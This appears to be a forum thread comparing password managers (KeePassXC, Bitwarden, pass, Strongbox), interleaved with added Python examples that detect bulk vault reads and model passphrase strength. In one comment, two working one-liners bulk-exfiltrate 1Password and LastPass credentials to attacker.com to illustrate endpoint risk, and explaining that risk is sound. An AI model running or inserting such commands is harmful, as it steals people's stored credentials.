Are there any good alternatives? Or do I have to use Kaspersky's password store?
I'd recommend setting a very strong password, with a key (you can generate one when you create the database) and a long decryption time.
If you need help setting strong passwords, I recommend EFF Dice-Generated Passphrases[1].
[1]: https://keepassxc.org/docs/KeePassXC_UserGuide.html#_databas...
Manual: All clients I've seen have the capability to merge databases. So you have one copy of the database in whatever online file storage service, plus each device will have its own local copy. Pull down the online db, do a bidirectional sync between the two databases, push back online.
Automatic: some clients natively support webdav, dropbox, etc as the master copy of the db file and will transparently do the change syncing for you.
There are also (unofficial) iOS and Android clients that sync to a git repo.
If you have access to the code then (on Android at least) you could build and install the APK yourself.
I moved away from 1Password after the developers essentially ridiculed their customers in their support forum. I realized that it's a hostile, aggressive and short-sighted company. That they are engaging in this racist action against Russians helps assure me that I made the right decision.
Bitwarden has been a drop-in replacement for all intents and purposes.
I don’t know about this incident of them being racist, but if I leave that aside, your words sound exactly like what I would say about the company! This isn’t something new with Agile Bits ridiculing customers or potential customers on its forums. There have been instances of this several years ago too when people questioned the licensing model and asked about the changes. They essentially behave as if users are stupid and that they (Agile Bits) are the only ones who know what’s best in every case. It’s quite condescending.
Here are some trivial examples of how malware can steal credentials in bulk.
Example: Exfiltrate all plaintext credentials from 1password
```
op list items | jq -r '.[].uuid' | xargs -n1 bash -c 'op get item "$1"' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
```
Example: Exfiltrate all plaintext credentials from lastpass
```
lpass ls | grep -oP '(?<=id: )([0-9]+)' | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
```
I have seen fake password manager browser plugins deployed in the wild that phish and exfiltrate master passwords, though the above methods are even simpler as they could just run a loop waiting until a password manager is eventually unlocked.
Software-only password managers may be useful for casual personal use cases such as food delivery services or social media accounts, but are not recommended for any use cases that protect any significant value like production corporate systems, and in particular not for high risk secrets such as cloud root account creds, TLS CAs, or crypto-asset keys (you know who you are).
I would strongly encourage you, for most use cases, to consider secret management solutions that decrypt one credential at a time on external hardware such as Password Store backed with a Yubikey, Trezor password manager, or a Mooltipass.
These offer damage control even when your endpoint is compromised.
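The pattern in the two one-liners above is what a defender can actually key on: a single parent process pulling many items from an unlocked password-manager CLI within seconds, which an interactive user almost never does. The following is an added example (not code from any commenter, 1Password, or LastPass) of that detection logic run over constructed process-execution events; the log line format (`timestamp uid=N ppid=N cmd=...`) and the 5-reads-in-30-seconds threshold are assumptions for the demo, and the command patterns are only the two CLI invocations shown on this page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). One parent (ppid 4242) drives a
# read loop over the vault; another (ppid 5151) does a single interactive read.
SAMPLE_EVENTS = """\
2024-05-01T10:00:00 uid=1000 ppid=4242 cmd=xargs -n1 bash -c op get item "$1" --
2024-05-01T10:00:01 uid=1000 ppid=4242 cmd=op get item "GitHub"
2024-05-01T10:00:01 uid=1000 ppid=4242 cmd=op get item "AWS root"
2024-05-01T10:00:02 uid=1000 ppid=4242 cmd=op get item "Bank"
2024-05-01T10:00:02 uid=1000 ppid=4242 cmd=op get item "VPN"
2024-05-01T10:00:03 uid=1000 ppid=4242 cmd=op get item "Mail"
2024-05-01T10:00:03 uid=1000 ppid=4242 cmd=op get item "Registrar"
2024-05-01T10:05:10 uid=1000 ppid=5151 cmd=lpass show 123456
2024-05-01T10:07:00 uid=1000 ppid=5151 cmd=ls -la
"""

# Assumed event layout; adapt the regex to your EDR/auditd export.
EVENT_RE = re.compile(r"^(\S+) uid=(\d+) ppid=(\d+) cmd=(.*)$")
# Only the CLI read commands that appear in the thread; extend as needed.
SECRET_READ_RE = re.compile(r"^(?:op get item|lpass show)\b")


def parse_event(line: str):
    """Return (timestamp, uid, ppid, cmdline) or None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, uid, ppid, cmd = m.groups()
    return datetime.fromisoformat(ts), int(uid), int(ppid), cmd


def find_bulk_reads(lines, window_seconds: int = 30, threshold: int = 5):
    """Flag every (uid, ppid) that issued >= threshold secret reads inside any
    sliding window of window_seconds. Returns a list of alert dicts."""
    reads_by_parent = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ts, uid, ppid, cmd = ev
        if SECRET_READ_RE.match(cmd):
            reads_by_parent[(uid, ppid)].append(ts)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for (uid, ppid), stamps in reads_by_parent.items():
        stamps.sort()
        start, densest = 0, 0
        for end, ts in enumerate(stamps):
            # Slide the left edge until the window fits.
            while ts - stamps[start] > window:
                start += 1
            densest = max(densest, end - start + 1)
        if densest >= threshold:
            alerts.append({"uid": uid, "ppid": ppid, "reads_in_window": densest,
                           "first": stamps[0].isoformat(), "last": stamps[-1].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in find_bulk_reads(SAMPLE_EVENTS.splitlines()):
        print("bulk vault read:", alert)
```

The single `lpass show` from the interactive parent is not flagged; the loop is. In a real deployment the same rule would be fed from process-creation telemetry, and the window/threshold tuned to what your users actually do, but the shape of the signal (many reads, one parent, seconds apart) is what the exfiltration one-liners cannot avoid producing.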
It looks useful and I'm thinking about downloading it, but if I did, I might not leave the binary as-named and I probably wouldn't locate it in /usr/local/bin, etc.
[1] https://support.1password.com/command-line-getting-started
So yes, you can do what you claim, as long as you first install the CLI tool, and then tell it to stay unlocked for some time. Or you know, just don't do that.
Do you have recommendations for software-only solutions that do this? ssh-agent has an option for it, not sure if anything else does (pass?)
If your OS is compromised you are hosed without dedicated and trusted external hardware as a gatekeeper.
I've been self-hosting it for a number of years now and have never had to think about it ever again - it works, has clients for all my platforms, never had any issues.
The real problem though is that it does not support hardware security tokens at the moment.
I don’t think this comparison is accurate. With a vault-based password manager, an attacker would need the master password AND the vault. The vault is usually protected separately, either because it’s a file that’s non-public (e.g. Keepass), or because it’s a web service that’s rate-limited or otherwise monitored (e.g. 1Password Cloud).
The only difference is going to be if the remote vault requires a separate auth factor. And that's a legitimate thing to consider. But I think (but I haven't thought much about it tbh) if you have a secure master password then the situations where this matters are limited.
I can't speak to this specific implementation, but the reality is that if your master password is leaked you have to rotate every credential no matter what.
I have explored syncing of these Keepass files with Nextcloud and Syncthing and both just works fine and I can recommend it.
I've always wondered if this might be a potential vulnerability. If a file leaks some day and an attacker gains access to the file, they have infinite time to try to break the password and you cannot do anything about it. Using online password storage could, in theory, limit the number of login attempts. Also, changing the password of the kdbx file has no effect, as the attacker still has physical access to the previous file with the previous password.
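The worry above (unlimited offline guessing against a leaked file) and the earlier advice about a key file plus a long decryption time are two sides of the same calculation. As an added example, not code from any commenter or from KeePass, here is a simplified model of it: a KeePass-style composite key over password and key file, a slow KDF stretch, and the expected brute-force time for a diceware passphrase. Assumptions are labelled in the code: the composite-key construction mirrors the idea rather than the exact KDBX byte layout, PBKDF2-HMAC-SHA256 stands in for the database's real Argon2/AES-KDF transform, and the attacker speed figures are invented for illustration.

```python
import hashlib
import os
import time
from typing import Optional


def composite_key(password: str, key_file: Optional[bytes] = None) -> bytes:
    """Simplified KeePass-style composite key (assumption: idea, not exact KDBX layout).
    The database key is a hash over the hashed password and, when present, the hashed
    key file, so a leaked .kdbx plus the password alone is useless without the key file."""
    material = hashlib.sha256(password.encode("utf-8")).digest()
    if key_file is not None:
        material += hashlib.sha256(key_file).digest()
    return hashlib.sha256(material).digest()


def derive_master_key(composite: bytes, salt: bytes, iterations: int) -> bytes:
    """Stretch the composite key. PBKDF2-HMAC-SHA256 stands in for the real transform;
    the point is that every offline guess costs the attacker this same work."""
    return hashlib.pbkdf2_hmac("sha256", composite, salt, iterations, dklen=32)


def calibrate_iterations(target_seconds: float, probe: int = 20_000) -> int:
    """Choose an iteration count so one unlock takes about target_seconds here.
    This is what a 'long decryption time' setting in the client does for you."""
    t0 = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", b"probe", os.urandom(16), probe, dklen=32)
    per_iteration = (time.perf_counter() - t0) / probe
    return max(probe, int(target_seconds / per_iteration))


def expected_crack_years(words: int, wordlist_size: int,
                         seconds_per_guess: float, parallel_guessers: int) -> float:
    """Expected time to brute-force a random diceware-style passphrase, assuming the
    attacker already holds the file (and the key file, if any). On average half the
    keyspace is searched before the hit."""
    guesses = (wordlist_size ** words) / 2
    return guesses * seconds_per_guess / parallel_guessers / (365 * 24 * 3600)


if __name__ == "__main__":
    salt = os.urandom(32)
    iters = calibrate_iterations(0.5)
    key = derive_master_key(composite_key("correct horse battery staple", b"key file bytes"), salt, iters)
    print(f"{iters} iterations -> key {key.hex()[:16]}...")
    # Invented attacker model: 1 ms per guess per core on 100,000 cores, EFF list of 7776 words.
    print(f"3 words: {expected_crack_years(3, 7776, 1e-3, 100_000):.2e} years")
    print(f"6 words: {expected_crack_years(6, 7776, 1e-3, 100_000):.2e} years")
```

With those (invented) attacker numbers a three-word passphrase falls in under an hour while a six-word one takes tens of millions of years; the KDF cost only multiplies that figure, so the passphrase entropy is what actually answers the "infinite time" concern, and the key file is the one thing that makes a leaked file plus a leaked password still insufficient.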
pro: it has much stronger security guarantees than the rest, it's self-hosted, but you can use other people's servers!
cons: there is no UI frontend for macs, and UI integration in browser could also be improved.
(i'm the author, ama)
Is it possible to store anything but website/username/password there? I can shoehorn my ssh password like "ssh 1.2.3.4"/"username"/"password" into that scheme, but it's ugly.
Is it possible to store bank card PIN code? I'm storing it as fake website right now which is far from ideal.
I need to access all the necessary information from iPhone.
I'm still running 1P 7, testing out some other solutions to see where to go in the future. I was happy to pay for the new versions every year or two, but going hosted means they've lost many customers like me who would rather keep the password database local.
- Windows
- KeePassXC Offline for Android
- iOS
- Linux
I don’t need to use KeePass, though. There are over a dozen different forks of the KeePass project to choose from. I decided on KeePassXC for my Mac, Linux, and Windows computers; and KeePass2Android Offline for my Android phone. I decided on these two because they feel more modern and I’ve confirmed that they won’t easily suffer from synchronization conflicts.
https://www.ctrl.blog/entry/keepass-vs-bitwarden-server.html
Also curious what issues you've had with syncing, mine definitely sync at points and only occasionally require me to do a manual sync. Usually it's only an issue if I just added an entry on another device and want to immediately use it on another.
I am tempted to try gopass, but if pass is good enough for Jason Donenfeld it's good enough for me!
(In short, I’ve switched to Secrets while keeping an eye on new KeePass apps, because I don’t want to use or run any kind of service)
TIL 1Password are also looking into a self-hosted option; maybe it'll happen if more people sign on to their survey: https://survey.1password.com/self-host/.
I'm willing to pay good money for a good product in this area. (I've said elsewhere I'd probably even be happy to pay 1P subscription if they didn't also do everything they could to prevent me using anything but their cloud.)
Here is my example: I've been using 1password since 2008ish. I've purchased every upgrade since then and even had more than one license. All was fine: Data was local, there was some backup method and some plain text export.
Some time ago, 1Password decided to go cloud and change to a subscription for using the software for new users. The client I have on my mac still works fine, but the only option was to "rent" the password management that stored my data on their servers.
The owners sugarcoated this in every way (pet peeve: talking in their mails about something completely different like recipes, then "by the way, subscription only in 3,2,1 ...").
I will not buy into being fully dependent on someone else when it comes to access to all of my online and offline systems. And neither should you. Same goes for any company.
So any of the suggested tools here should do two things: work independently of an online/sync connection (and be able to access/modify data until the online connection has been reestablished), and be able to export data in a format that can be transformed/read by most of the others.
I switched to my own local instance of Bitwarden (Vaultwarden) and use the client for any device I own. Switch took about half a day and I never looked back.
For personal use keepassxc and syncthing. Keepassdx on android.
Edit: enterprise is self hosted. Keepassxc with syncthing doesn't need hosting
After trying the usual famous ones for a test period, and not being happy with any of them (cloud crap, no memory encryption, no clipboard cleaning - to just name a few), I decided to take a look at a few that were open source, learned their overall intricacies and started to code my own. At the beginning nothing fancy: just a SQLite DB, a focus on the name field, a system-wide shortcut for my manager to pop up, and then selecting the entry. The manager would type in the username, TAB to the password field, then type the password there as well and press ENTER. That was the most rudimentary one, and whenever some new web/app was not working I would see why and extend its code/logic from there.
After about 3 months I was happy with everything I needed, and very rarely, something like every 6 months, I would touch its code for a maximum of 2 days to make it work. It's been over 5 years at this point and I use it daily on the several dozen web sites / desktop apps I need. During this time I never did a full refactoring or changed its underlying business logic.
So my advice for you @vasachi, if you can, do the same. The satisfaction will be huge.
It's fully open source, with an AGPL license.
https://keepass.info/download.html
It supports having a key file on top of password.
It has plugins to import from 1password too:
KeePass with the database file hosted on Dropbox
On my MacBook I use Strongbox; on my iPhone I also use Strongbox.
Strongbox supports biometric auth, and is really nice to use, and supports having the keepass database on many different cloud providers
- Open Source
- Great apps
- Great chrome & firefox addon
So convenient and Google is trustworthy to that extent.